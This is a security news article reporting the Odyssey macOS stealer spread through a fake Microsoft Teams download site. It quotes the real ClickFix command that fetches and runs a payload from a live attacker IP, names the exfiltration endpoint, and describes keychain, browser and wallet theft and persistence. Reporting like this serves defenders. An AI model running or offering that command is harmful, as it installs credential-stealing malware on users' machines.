Odyssey macOS Stealer Spreads Through Spoofed Microsoft Teams Website

Cybersecurity researchers have identified a sophisticated new variant of the Odyssey stealer malware that targets macOS users through a fake Microsoft Teams download website, representing a significant evolution from earlier TradingView-themed attacks reported by Forcepoint in early August 2025.

CloudSEK’s TRIAD discovered the

malicious domain teamsonsoft[.]com during routine threat intelligence operations, part of a broader infrastructure cluster comprising 24 unique IP addresses employing the same ClickFix social engineering technique.

The attack leverages Microsoft’s trusted brand recognition to trick users into executing malicious commands disguised as legitimate software installation procedures.

The attack mechanism begins when victims visit the spoofed Microsoft Teams site, which displays operating system-specific instructions.

For macOS users, the site prompts them to copy a seemingly harmless command that, when pasted into Terminal, executes a base64-encoded payload: curl -s http://185.93.89.62/otherassets/plist | nohup bash &.

This command launches a heavily obfuscated AppleScript compiled file (.scpt) using osascript.

Advanced Data Harvesting and Persistence Mechanisms

Once executed, the Odyssey stealer demonstrates sophisticated collection capabilities targeting the Apple ecosystem comprehensively. The malware harvests Apple Notes databases (NoteStore.sqlite), Safari artifacts, including Cookies. binarycookies, and copies the entire login keychain.

It systematically enumerates Chromium-based browsers (Chrome, Brave, Edge, Vivaldi, Opera) and Firefox profiles, extracting cookies, saved logins, autofill data, and specifically targeting browser extension storage for cryptocurrency wallets.

The stealer targets an extensive list of desktop cryptocurrency applications, including Electrum, Coinomi, Exodus, Atomic, Wasabi, Monero, Bitcoin Core, Litecoin Core, Dash Core, Electron Cash, Guarda, Dogecoin Core, Trezor Suite, and Ledger Live.

Additionally, it collects up to 10MB of files from the Desktop and Documents folders with file extensions such as .txt, .pdf, .docx, .keys, .wallet, and .kdbx.

After collection, the malware packages all the stolen data into /tmp/out.zip and exfiltrates it to the command-and-control server at 185.93.89.62/log using HTTP POST requests with specific headers including “buildid” and “username: vipx”.

The most concerning aspect involves the malware’s persistence and app replacement capabilities. It installs a LaunchDaemon persistence mechanism using randomly named .plist files in /Library/LaunchDaemons/, requiring the user’s password obtained through fake authentication prompts.

Most alarmingly, it completely replaces the legitimate Ledger Live application with a trojanized version downloaded from the C2 server, potentially enabling ongoing cryptocurrency theft.

Organizations should implement network monitoring for unusual curl POST requests with zipped data, audit LaunchDaemons for suspicious entries, and users should reset all credentials from compromised systems while removing any trojanized applications from them. /Applications/.

Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates

The post Odyssey macOS Stealer Spreads Through Spoofed Microsoft Teams Website appeared first on Cyber Security News.